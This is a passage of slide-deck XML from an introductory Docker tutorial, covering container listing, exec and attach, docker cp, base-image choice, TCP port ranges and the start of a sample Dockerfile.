            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957575" y="1363475"/>
            <a:ext cx="7400100" cy="28665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SzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="4300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container ps -a </a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="4300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="4300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="4300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="4300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker ps -a</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="7498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25000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="34920"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3150">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to get into a running container?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1506" name="Google Shape;1506;p242"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662075" y="1363475"/>
            <a:ext cx="8302200" cy="28665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275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container exec -it </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;contName/ContId&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /bin/bash</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container attach &lt;contName/ContId&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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243"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1435625"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2860">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How To execute Commands in a Docker Container from Host</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3534">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1512" name="Google Shape;1512;p243"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465025" y="2191850"/>
            <a:ext cx="8520600" cy="130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rgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker exec &lt;contName&gt; &lt;commands&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="4000">
              <a:solidFill>
                <a:srgbClr val="6AA84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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="359650"/>
            <a:ext cx="8520600" cy="707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3359">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to check which shell we are using?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Google Shape;239;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400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo $SHELL</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo $0</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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244"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="98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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copy a file from the host to a running container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1518" name="Google Shape;1518;p244"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692700" y="1533475"/>
            <a:ext cx="696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400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	docker  cp Source CONTAINER:Target</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	docker cp index.html web:/index.html</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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p2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Copy a file from a container </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to the host</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1524" name="Google Shape;1524;p245"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464100" y="1457275"/>
            <a:ext cx="8577000" cy="296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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	docker  cp  CONTAINER:SOURCE  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TARGET</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	docker  cp web:/index.html  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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2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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It's</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hard to start with fresh OS images</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1530" name="Google Shape;1530;p246"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="385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solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Better to use Technology Specific Images</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suppose if you are a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Node Js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Developer better to start with node image instead of using ubuntu and install node in the image.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Will be waste of our time . So we will use</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker pull node:latest</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suppose you are a Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Developer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the your will use</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker pull python:latest</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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247"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240275" y="873650"/>
            <a:ext cx="8520600" cy="85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Ports</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1536" name="Google Shape;1536;p247"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1866850"/>
            <a:ext cx="8520600" cy="2041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sz="3800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ports are communication path of a operating system</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (i.e container)</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2621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PORT Limit</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1542" name="Google Shape;1542;p248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1214775"/>
            <a:ext cx="8697000" cy="36219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3100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The minimum TCP port number is 0</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The highest TCP port number is 65,535</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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4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Sample </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3620">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1548" name="Google Shape;1548;p2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36666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>FROM ubuntu:latest</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WORKDIR /anil</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
